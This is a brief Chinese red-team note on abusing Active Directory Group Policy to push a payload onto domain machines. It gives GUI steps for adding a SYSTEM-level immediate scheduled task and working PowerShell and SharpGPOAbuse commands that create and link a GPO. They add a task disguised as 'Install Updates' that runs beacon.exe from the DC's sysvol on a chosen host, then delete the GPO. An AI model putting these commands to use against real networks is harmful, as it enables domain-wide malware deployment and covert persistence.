【域渗透】组策略下发上线机器

一、操作利用

gpmc.msc打开组策略，修改为强制，下面添加选择要上线的机器或用户

 

 

Default Domain Policy点击选择编辑，添加的计算机就选择计算机配置，用户就选择用户配置，添加即时计划任务

运行任务时账户不能选择域内账户包括域管，选择System如有弹窗提示输入密码点取消即可

 

启动程序路径可以放在域DC sysvol目录下，不要点×直接回车保存即可，等待90-120分钟时间

 

在域控上执行可强制对应机器刷新组策略，暂时尝试

Invoke-GPUpdate -Computer "redteam.com\CODE"

二、利用SharpGPOAbuse进行下发利用

创建GPO

powershell -c Import-Module GroupPolicy;new-gpo -name TestGP02

将GPO链接到域redteam.com

powershell -c Import-Module GroupPolicy;new-gplink -name TestGP02 -Target 'dc=redteam,dc=com'

添加计划任务--TargetDnsName为指定某台机器

SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc\sysvol\redteam.com\beacon.exe" --GPOName "TestGP02" --FilterEnabled --TargetDnsName 192.168.64.153

删除GPO

powershell -c Import-Module GroupPolicy;Remove-GPO -Name TestGPO2